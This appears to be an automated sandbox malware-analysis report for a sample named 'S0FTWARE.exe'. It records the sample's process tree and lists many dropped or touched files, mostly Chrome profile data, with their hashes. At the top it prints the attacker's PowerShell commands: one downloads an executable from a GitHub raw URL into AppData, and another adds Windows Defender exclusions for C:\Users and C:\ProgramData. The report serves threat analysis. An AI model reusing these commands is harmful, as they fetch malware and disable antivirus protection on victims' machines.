                                                                                                                                                                                                                                                                                                                powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\yonnbsncv\fkskvyd.exe'"
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                PID:4144
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\S0FTWARE.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Desktop\S0FTWARE.exe"
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                              PID:1492
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\juerwjbjyigx', 'C:\Users', 'C:\ProgramData'"
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:5972

                                                                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                                                                              MITRE ATT&CK Enterprise v16

                                                                                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                                                                                              • C:\ProgramData\bsjm7\lxlxt00zu

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                40KB

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                dfd4f60adc85fc874327517efed62ff7

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                f97489afb75bfd5ee52892f37383fbc85aa14a69

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                c007da2e5fd780008f28336940b427c3bfd509c72a40bfb7759592149ff3606e

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                d76f75b1b5b23aa4f87c53ce44c3d3b7e41a44401e53d89f05a114600ea3dcd8beda9ca1977b489ac6ea5586cf26e47396e92d4796c370e89fab0aa76f38f3c4

                                                                                                                                                                                                                                                                                                              • C:\ProgramData\wt26p\ekx4oh

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                6KB

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                b9539120d0e9d83500cc54fc8eb174a9

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                eeadb540065a3307f4eddab7e868a1eadb7f2698

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                c332968dee497537f85a402a5cfb890643688b5e6d3d85bdc60b261f805784c9

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                9fc4aabf1aebb7bf7d7de06a31a69337b42dd9026b5a34e14b390b4cbe5d89d31bf66c77b997f5adf7f31225d962157d8540dace8f4114f6fe241852781bec6a

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                734B

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                e192462f281446b5d1500d474fbacc4b

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                5ed0044ac937193b78f9878ad7bac5c9ff7534ff

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                f1ba9f1b63c447682ebf9de956d0da2a027b1b779abef9522d347d3479139a60

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                cc69a761a4e8e1d4bf6585aa8e3e5a7dfed610f540a6d43a288ebb35b16e669874ed5d2b06756ee4f30854f6465c84ee423502fc5b67ee9e7758a2dab41b31d3

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FD2419AD66A6731F837A249AC4035040_0C1608F7509137144E257017D76A172E

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                344B

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                8c1da6017d5a8f1a15b679ad5af3ab59

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                9dfbeb54709ec0941b96991be213804c3277a71c

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                dc120fcc72f7f96811fef384632623dd0c6b8850f154edab05f9093c3692c024

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                e81c62e867e7b3692c4fb1b5b4e8cc526624738d9bb95ec8bea6406cdd08cec6e8bc34b333687d5b1dde9a91528f297e72590121333109f1537e204092393b0c

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                192B

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                6c0fc072fbfcdc3fe8cf965a5ca42790

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                82e4723291f2160d22ddc98f290de27b48f540fd

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                f1ef467d8a45f853ab7005648efc20f69ec09806f2b5c9d621ffc7ceaf585c40

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                115a746dfb55da478242af31aea2b2a6035af4087c39fb9984fe85c2148bc833c0a540a67376ef0cc0ec443cab44efc3840852765344b40da198d3cb6ae8c985

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FD2419AD66A6731F837A249AC4035040_0C1608F7509137144E257017D76A172E

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                540B

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                f734a3f4b35df02d5c00d26c9d6bb5bf

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                2e75a7aeea801ea3a632b95f0e98983280270b75

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                1f6aa8093af5e472d16f3d9e05cbfaa0c5abfb961fb6ad55382364c3b6687fb8

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                3c5d40504034b4a0e8ceeb4bd16c199e131db6814b3faff7f0059ca1905ec0db872e4e425bf1648776a88a28d2282d5326fdd613aed9503aebfdf3511b19ec66

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                1024KB

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                34c29bdb9e41b1f47f2d2786762c12ec

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                4075131b18c3487e3e848361e112009c897629c7

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                67ee11b51cd6f637795e31ab501f135ed595c8459bce885735f08b0418513a17

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                ca3a978798e77b2ced27b379f38e935ef18beaa7ea23e34270a9af20b37e1b1c5edf9478606311cf1acabd83992766cb3da8444de9394c674d5955bdbc53c0d0

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                40B

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                fe27b9f6f4b7432b9201aa514fa4bc18

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                59e30b6cfb524bc2dce01b17f04143f8e5a48d54

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                87c2e194c56ce86196416932dc2caf26b4cd5af38af9c1ce52877cbe5595e8c0

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                0c8df50c770239502e70f1e07f3b9b26a632238806336caed432c163dfb4022b28e214b90383dc3610544725c1ff8b9fbbfde7ee01eee8c108292d604e1ae852

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\6fdc3423-fd47-479a-a267-881fa21e088a.tmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                1B

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                5058f1af8388633f609cadb75a75dc9d

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                3a52ce780950d4d969792a2559cd519d7ee8c727

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                649B

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                1dcee74e36d4a65844c0be188cff606b

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                a34f7f0577065f3c540cfbbbba9f01a554c9bd82

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                518600324b29a1f93de1ab30697f0eb14a6f79a7f46d37674a6847476ebead97

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                6f575e2f9d0cd78a9cdbfe09dd6932524fcf14f6a14794351bbf1a2c0dd3e915c97e4ee8dd99c2d251b0511d3c42f57b111efee9382cfc69429b7902531908a2

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                ddb94b9d56aed17e1454fa7bc9af66e8

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                0dc0a0facd4f72a8d86b5cf0992dbc66cbe35563

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                792981f41aa8716301a68c603c0d66c925945e7227d9ffc110cfb21ae5c15a6f

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                060698ebd5b9c6b3a740acf746dcdb5eaa67203ceaa34f3a7039d974c983632faaadd69567979e9b58ecdcb73cc2dbd49383f56c5fdf0fc86c0c761cecb5dbed

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                288KB

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                41ba55ba2bd91348873fba0eb8306568

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                8c33d8fc5abe28b0b11f687861831cdfaad89a03

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                e5790e846c2860af2f28c6643388910bd7801ea1406c30e77920e2a4745b9984

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                77ee7c0bbc8f5ac3db5082c2d1bfdbec57a42f8b1a76d166ef346ecc7f64a00ffc26144b221c3ae3eb62437f1241b5ab3c2843910a3d2f594a4d6edcc7e0ba76

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                2B

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                d751713988987e9331980363e24189ce

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                10KB

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                667b86752f624d208811b45b1f0d8e7b

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                ba2c7139d6bca88a27d6c5268afc12ced69839e1

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                a050ebf4ee791f1f2d1e6ef3d7b8f89d435f714860ae861b5afa1c240433e510

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                8794ad4daaa6d7c07db0b9f12e8b340778f3433e9a5ab3aa8985d25fa9b3876bdf818df04a3204914d0d44d18a16e4c544d68374283dc1f36bfad0162b1994d8

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                11KB

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                7174e76ce89ce106637bb6cfe417e6ca

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                009c95d2bb73b2be7a2c3c8889a1188f12d0021b

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                b6e64870c83ce94afc545f8372934c94999c00310ea7dc2e443b502c784f6539

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                bbe8bf98221f6ec727aea9b804728be94552dc4b001320df95a5163f8ec14e7a233e28d484464f628c0e8ca4d14cd5e66bd8280e7b287ea46a09f3fea2098408

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                11KB

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                e7f4d884ee318fe946915287ddb254cc

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                15369cbe811b8f68badf6b7239e026654b371bfb

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                233be52584a0c0072f4e473d5b509cb95464abd8ac0be8492fb10d6ef056591e

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                130b44232cd6ed07e6e448c7ac971cd899d24db1a4c91918ac37f7026e393c788107affca11c0bf8ee5b284a941326566f7a342086575bf7360c652308ebe715

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                11KB

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                c2e3d830a28ee98ea342914dbc087b68

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                983ebd9eff427f0dfd59ba2240f0b9f7546a225f

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                5c0289fc24d9898985c8c448856bb5b52ea81c9dbea490f535e3d146807c3364

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                5451095b49a33c78e714cf69daf623c2dc939903bc0e26f5a1f82591dbed1412fe3d7c38c0d35c1355fb90e0e4951c9141bb9c131ddae5eaed95e4a204531562

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                12KB

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                41e52b7e8555a10ab0be7d8b81e805b7

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                76d7d8b556b10db5a32ff76579eab6742d83ee26

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                f38fee51decc7a7339b14aa04c863f68caaf061f0f6fe2e574ef2ab7cd29580d

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                59909931f8613055b973655fbab49637194a82dd127e5c41318b0e5ce3ad7b78d9d44b52645b09cc7a1460d3095fe6de51cb30a6d59959f0e32bea879cf16efd

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                15KB

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                7ba027b073653a42142cdd2b5d5ac1cd

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                c75da5ec027bd124e5495b793312119191fba2bb

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                b7d17470a2bd971b7fa7b68e17fab8298dbecbd91b1e92dc2fba3a2410592ebf

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                7cad60eea2236d3e865f62669c7553a41a7c61522cd2ddde2bcc984457aa1734513761470f4daf25f63837cb9e98a0b84ace1fa08167bd05893e2713fd3b6f35

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                15KB

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                7203221fc4d3d0f81e8df40f4fee295f

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                6709b24bfd654fb619911c175ef77b3e749e5425

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                a453be8a75901daf7c8507a467cc5989bf8dcef5707ffa4fa6663aaadeb2b819

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                0e935a58eeded6b9a4c428e8ae556cb1513b66a388677f908d39a1c7fbac276dc0bf0bd3c6a6508044e34073d5997612bd5bcdc9e96e4ed35cfc685d75754611

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                96B

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                f8ea90699eceb5019274b2f20c66fb27

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                f9f1f9ab22d3987d437b3ac7aa33466a97786ef3

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                ffa1e03537406dd68d100cd0b2bc2d1e051f61588190ab66d8a2522cf3fd8639

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                8460df4b1ed418d2138698ceac63cd4139bdd433235ea02d23569da6e28fbdbe05687f84b471fffef5e4edb79fdd380ce9844376211baa46b56f5da131a0c09a

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe580625.TMP

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                48B

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                ae3d03e7dd263d9ab2d72e1fd7b86997

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                3a36ebd1c5444de0aa8cb76125d2291d2cb93501

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                331f5f13e8c030c1a42f1caa458506abefc7b9c6227d49f209f3bc8e5c313c86

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                8d28bfb1711ddda28a2d04fe79be70e03950526b15269c2b3e3df2a868ae540bd8718c2bf075e1573732528d787f628e690a9c3cf0c65a5cbe8ab0d5887cf5ef

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\cache\d46138c1deb84638_0

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                63KB

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                dbc2ba8450b24dd55dabce61eee4055b

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                fafa7a4ae9288e881f097752d09ceadc0ca584b8

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                045374cc2ce3f153d72835e6a79db7d6651cbcb3ff088779b2eb8db39f6b9b3e

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                da6f9aa1a1aa352926b3300ee0cddbc0c3bf139d6a4ef0baa359f90f9566d9e814ef8d202aa23799d44d090de8fa6ef729ece00f1cc6979c863027c1b3a91a59

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\cache\index-dir\the-real-index

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                72B

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                cba911ec739e50cac33504b264075d01

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                377ae4f347e1aef894970465f2c54367fd21ed9e

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                d385046af6c9e475c12e7beecc18d24abd6f44749038f33e9602a9bf6201e0ee

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                5f341c93bf40d28a1da6e5df884810b6c20d9e97caafa75a97cd7debd0c96b56e03d5cb3ea884ce1f7beb338e16a7313fb7d1c71ddd1683c553f1e5215004e78

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                321B

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                32bbebb592fd2311ee9dca384074b2b6

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                aa5b50e75b10299a177e8081c96caf09993a4f83

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                d83435a957ee8a790108272226baa56548fdf0ff4419d39c586b4eb13df8c3d9

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                8aa93f51056a2b8af2ed4a7630c924dfca7d6049d52d2609a099ccf24b8a2e79b043b2fd450aa5183f25200bb27af0fd306cc7e3c5e5406df07728da9fd9b822

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                130KB

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                6f87076c8a47960e965d46d41db3d2f6

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                18afb1f7872b4dfed179b2d7a86872c56bbe8261

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                5492068634a3ae57788f6353e29e974e4cd377e1b3c88f48cf55269bde131c41

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                8bad5eccb411852f3fb8a6f3ccfb6405d6d0f415fc8db1ca094b8aa60dc5dbd754aadb8d8380dd30decc41c3cea4436b753dc39b5aeb95be1e76d4b65c7802ed

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Browser

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                106B

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                de9ef0c5bcc012a3a1131988dee272d8

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                fa9ccbdc969ac9e1474fce773234b28d50951cd8

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                3615498fbef408a96bf30e01c318dac2d5451b054998119080e7faac5995f590

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                cea946ebeadfe6be65e33edff6c68953a84ec2e2410884e12f406cac1e6c8a0793180433a7ef7ce097b24ea78a1fdbb4e3b3d9cdf1a827ab6ff5605da3691724

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                13B

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                a4710a30ca124ef24daf2c2462a1da92

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                96958e2fe60d71e08ea922dfd5e69a50e38cc5db

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                7114eaf0a021d2eb098b1e9f56f3500dc4f74ac68a87f5256922e4a4b9fa66b7

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                43878e3bc6479df9e4ebd11092be61a73ab5a1441cd0bc8755edd401d37032c44a7279bab477c01d563ab4fa5d8078c0ba163a9207383538e894e0a7ff5a3e15

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                79KB

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                8b09da5008fa77fbe7c55bf1402c99ec

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                ebd93545e8d4dc7a39fa5b556fefba255406431c

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                1b75db0dfb568db34a0f4c20288d6d08ff47cc8f1afab45ca7afe34d5b0e78d7

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                bca7aec1c4cc54db44faa4ee155ef4f34e31eeceb388d7571d9f42f2efbe01c66edc86edaf05c53ebedac427d7816401899d5758ec261d8fe61a0cb9b31bcb95

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                78KB

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                3749b2df2a022b6301c2244965f9800e

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                e6c9c62e1572d8c4586b724875fa7c34a516493c

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                2089d9bd4a6c3902a16f55535675fe3328231a599acb52f064a0681630b61ef7

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                d55c806c9855ca0787dd3d3cbca279f63755c341543c1117d32cb1bace8b7820f8f503518b9b17eb9a9be982f92e502c0c5fa7848ed70f640f06e27818f5694f

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                80KB

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                a5f4d700d73dc5922231cdfd9f927546

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                f2423de73d954d4e6d30839f827a53d0e045eca9

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                235ecb38d43750491a3b81925252264cef318c05680990e9514a068a19dc35c9

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                b97b2e9c6f7d30d4c3b4fad525994cb1010b7b55eff0fc52e3762dea3f7a3347a96f503ace262819f7a4bc0d034fdfcad8406959bae9019f86e0dcd36379f9d7

